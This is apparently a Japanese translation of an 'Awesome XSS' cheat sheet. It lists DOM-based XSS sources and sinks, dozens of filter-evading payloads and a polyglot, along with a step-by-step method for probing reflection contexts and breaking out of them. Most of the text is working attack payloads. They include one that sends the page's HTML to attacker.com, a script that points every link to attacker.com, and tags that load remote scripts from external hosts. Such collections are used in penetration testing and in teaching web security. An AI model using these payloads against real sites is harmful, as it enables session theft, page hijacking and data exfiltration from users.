このリポジトリはAwesome XSSリソースのコレクションです。コントリビューションは歓迎です。Issueとして提出してください。
Jack Masa氏による美しいXSSマインドマップはこちら
VulnerableNot vulnerableSource: 外部(信頼できない)ソースによって制御される可能性のある入力。
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
Sink: 脆弱性につながる可能性のある危険なメソッド。ここではDOMベースのXSS。
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
このシンクとソースの包括的なリストはdomxsswikiから引用しています。
<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="https://github.com/s0md3v/awesomexss/blob/master/javascript%26colon%3Balert%281%29">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--` --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
x
<svg onload=write()>
私が作成した、20以上のコンテキストを突破できるXSSポリグロットです:
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
仕組みの解説はこちら
検出されにくいイベントハンドラ
ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel
よく使うHTMLタグ
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
ケース: <tag>You searched for $input. </tag>
<svg onload=alert()>
</tag><svg onload=alert()>
ケース: <tag attribute="$input">
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()
ケース: <script> var new something = '$input'; </script>
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
そう、alertはメジャーすぎるのでconfirmを使います。
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
i.href = "https://attacker.com";
});
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
ここまでで何も機能しない場合は、Awesome Bypassingセクションを参照してください。
まず、d3vのような無害な文字列を入力し、ソースコードを確認して、リフレクションの数とコンテキストを把握します。
次に属性コンテキストの場合、x"d3vを入力してダブルクォート(")がフィルタリングされるか確認します。x"d3vに変換される場合、出力は適切にエスケープされている可能性が高いです。その場合は、x'd3vを入力してシングルクォート(')でも同様に試します。x'に変換されるなら、もう打つ手がありません。試せるのはエンコーディングだけです。
クォートがフィルタリングされていない場合は、Awesome Context Breakingセクションのペイロードをそのまま試せます。
JavaScriptコンテキストの場合、どのクォートが使われているか確認します。例えば以下のようにしている場合です。
variable = 'value' or variable = "value"
ここで、シングルクォート(')が使われているとします。その場合はx'd3vを入力します。x\'d3vに変換される場合、プローブにバックスラッシュを追加してバックスラッシュ(\)自体をエスケープしてみます。つまりx\'d3vです。それが機能したら、次のペイロードを使用します:
\'-alert()//
しかしx\\\'d3vに変換される場合は、次の方法でスクリプトタグ自体を閉じることだけが試せます:
</script><svg onload=alert()>
単純なHTMLコンテキストの場合、プローブはx<d3vです。x>d3vに変換される場合は、適切なサニタイズが行われています。そのままリフレクションされる場合は、ダミータグを入力して潜在的なフィルタを確認します。私がよく使うダミータグはx<xxx>です。何らかの形で除去・変更される場合、フィルタが<と>のペアを探しているということです。これは次のように簡単にバイパスできます:
<svg onload=alert()//
またはこちら(すべてのケースで機能するとは限りません):
<svg onload=alert()
ダミータグがそのままソースコードに残る場合は、以下のいずれかのペイロードを使用します:
<svg onload=alert()>
<embed src=//14.rs>
<details open ontoggle=alert()>
注: これらのペイロードはどれもシングルクォート(')もダブルクォート(")も使用しません。
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
<svg/onload=confirm()>
<svg onload=confirm()>
<script>confirm()</script>
<svg onload=confirm()//
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
<x onclick=confirm()>click here
<x ondrag=aconfirm()>drag it